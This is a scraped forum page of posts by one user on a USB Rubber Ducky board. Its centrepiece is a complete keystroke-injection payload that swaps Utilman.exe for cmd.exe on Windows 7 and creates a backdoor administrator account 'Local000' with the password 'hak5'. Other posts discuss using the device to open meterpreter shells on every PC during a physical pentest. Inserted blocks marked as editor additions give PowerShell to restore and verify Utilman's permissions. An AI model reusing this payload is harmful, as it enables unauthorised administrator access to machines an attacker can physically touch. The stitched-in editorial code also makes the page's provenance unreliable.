mackwage
Posts posted by mackwage
-
Great! Keep me up to date! :)
-
Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once as netcat cannot juggle multiple connections. Was trying to think if during a physical pentest, you could use the ducky on every pc in sight to set a meterpreter session back to your computer so you have a shell on all of them at once.
Thoughts?
-
In Windows, installing Java doesn't put it in your system32 folder so you have to refer to the Java folder for the Java.exe. Or at least that's how it is on both of my Windows machines.
-
Thanks for the tip on the default delay.
I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.
icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
This command didn't actually seem to change the permissions unless I added the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works, which led to me adding the last part.
STRING xcopy cmd.exe util\
I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.
STRING cd util
STRING ren cmd.exe Utilman.exe
STRING cd ..
I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.
STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.
STRING rmdir /s /q util
Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.
I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P
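The post above asks for the icacls command that puts Utilman.exe back to its default permissions. The following is an editor-added example, not code from the post: instead of guessing what the stock ACL looks like, snapshot it with icacls /save before the takeown/icacls lines run and put it back with icacls /restore once Utilman.exe.bak has been renamed back. Ownership is not part of what /save records, so it is captured and reset separately. The PowerShell wrapper, the function names and the backup location under $env:TEMP are the editor's choices; it needs an elevated prompt.

```powershell
# Editor-added example; not from the forum post. Run from an elevated prompt.
# icacls /save writes the DACL of the named file into a store file; /restore applies
# that store to the directory the stored names are relative to. The owner is not in
# the store, so it is recorded to a side file and reset with /setowner.
$Sys32    = Join-Path $env:SystemRoot 'System32'
$AclStore = Join-Path $env:TEMP 'Utilman.acl'      # assumed location for the backup

function Save-UtilmanAcl {
    # Run icacls from inside System32 with a relative name so the stored entry is
    # just "Utilman.exe" and /restore can later be pointed at the System32 folder.
    Push-Location $Sys32
    try {
        icacls Utilman.exe /save $AclStore
        (Get-Acl -Path 'Utilman.exe').Owner | Set-Content -Path "$AclStore.owner"
    } finally {
        Pop-Location
    }
}

function Restore-UtilmanAcl {
    # Replaces the current DACL with the saved one, which drops the
    # administrators:F entry the payload granted.
    icacls $Sys32 /restore $AclStore

    # Put ownership back; on a stock install System32 binaries belong to
    # "NT SERVICE\TrustedInstaller", which is what the side file will contain.
    $owner = (Get-Content -Path "$AclStore.owner" | Select-Object -First 1).Trim()
    icacls (Join-Path $Sys32 'Utilman.exe') /setowner $owner

    # Show the result: Administrators should no longer appear with (F).
    icacls (Join-Path $Sys32 'Utilman.exe')
}
```

Call Save-UtilmanAcl before the takeown line of the payload and Restore-UtilmanAcl after the original Utilman.exe has been renamed back; /restore applied to a still-swapped file would only fix the ACL on the copied cmd.exe.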
-
Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows 7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.
REM Phase 1: open a command prompt, take ownership of Utilman.exe and give Administrators full control
DELAY 200
GUI r
DELAY 50
STRING cmd
DELAY 50
ENTER
DELAY 50
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
REM Phase 2: stage a copy of cmd.exe in a scratch folder, rename it to Utilman.exe and move it into System32
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
REM trailing backslash tells xcopy the target is a directory, so it does not prompt
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
DELAY 50
REM "cd util", not "cd /util": in cmd.exe a leading slash means the root of the drive, so "cd /util" would fail from System32
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
ENTER
DELAY 50
REM /q suppresses the "Are you sure" prompt
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Phase 3: Win+U now launches the renamed cmd.exe; use it to add a local administrator account
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Phase 4: put the original Utilman.exe back
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
REM "del", not "delete"; del does not prompt when given a single file name, so no "y" is needed
STRING del Utilman.exe
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
REM Phase 5: set the password on the new account (net user with * prompts for it twice)
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
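Added example, not part of the post above: a PowerShell check for whether Phase 4 of that payload actually left the box clean. It compares Utilman.exe against cmd.exe by SHA-256 rather than by Authenticode signature, because a renamed cmd.exe still carries a valid Microsoft signature, and it also reports the leftover Utilman.exe.bak, the owner after takeown, and whether the Local000 account still exists. The function name is the editor's; "net user" is used to probe the account instead of Get-LocalUser so the check also runs on Windows 7 (Get-FileHash needs PowerShell 4 or later).

```powershell
# Editor-added verification; not from the forum post.
# Run from an elevated PowerShell prompt on the machine the payload was used on.
function Test-UtilmanRestored {
    $sys32   = Join-Path $env:SystemRoot 'System32'
    $utilman = Join-Path $sys32 'Utilman.exe'
    $cmd     = Join-Path $sys32 'cmd.exe'

    # A renamed cmd.exe is byte-identical to cmd.exe, and both are validly signed
    # by Microsoft, so hash comparison is the reliable test; signature checks are not.
    $utilmanHash = (Get-FileHash -Path $utilman -Algorithm SHA256).Hash
    $cmdHash     = (Get-FileHash -Path $cmd     -Algorithm SHA256).Hash

    # The version resource travels with the bytes: a swapped file still reports cmd's name.
    $origName = (Get-Item -Path $utilman).VersionInfo.OriginalFilename

    # A leftover backup means the "ren Utilman.exe.bak Utilman.exe" step never ran.
    $bakLeft = Test-Path -Path (Join-Path $sys32 'Utilman.exe.bak')

    # takeown leaves the owner as the user (or Administrators with /a);
    # stock System32 binaries belong to TrustedInstaller.
    $owner = (Get-Acl -Path $utilman).Owner

    # The account created in Phase 3. "net user" exits non-zero if it does not exist.
    $null = & net user Local000 2>$null
    $accountExists = ($LASTEXITCODE -eq 0)

    [pscustomobject]@{
        UtilmanIsCmd            = ($utilmanHash -eq $cmdHash)
        OriginalFilename        = $origName
        BackupLeftBehind        = $bakLeft
        Owner                   = $owner
        OwnerIsTrustedInstaller = ($owner -eq 'NT SERVICE\TrustedInstaller')
        Local000Exists          = $accountExists
    }
}

Test-UtilmanRestored | Format-List
```

Anything other than UtilmanIsCmd False, BackupLeftBehind False and OwnerIsTrustedInstaller True means the restoration phase did not complete; Local000Exists True is expected while the account is still wanted and should be False after cleanup.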
-
I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd, then hit Shift+F10, it does the same behavior.
-
I seem to have issues with the payload as is. The issue seems to be with the below lines:
MENU
STRING a
ENTER
I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue?
[Version 1] Emulating Other Usb Devices
in Classic USB Rubber Ducky
I apologize if this seems like a dumb question. I am seeking to understand the benefit in having the duck emulate other USB devices. Would it execute the malicious script any differently?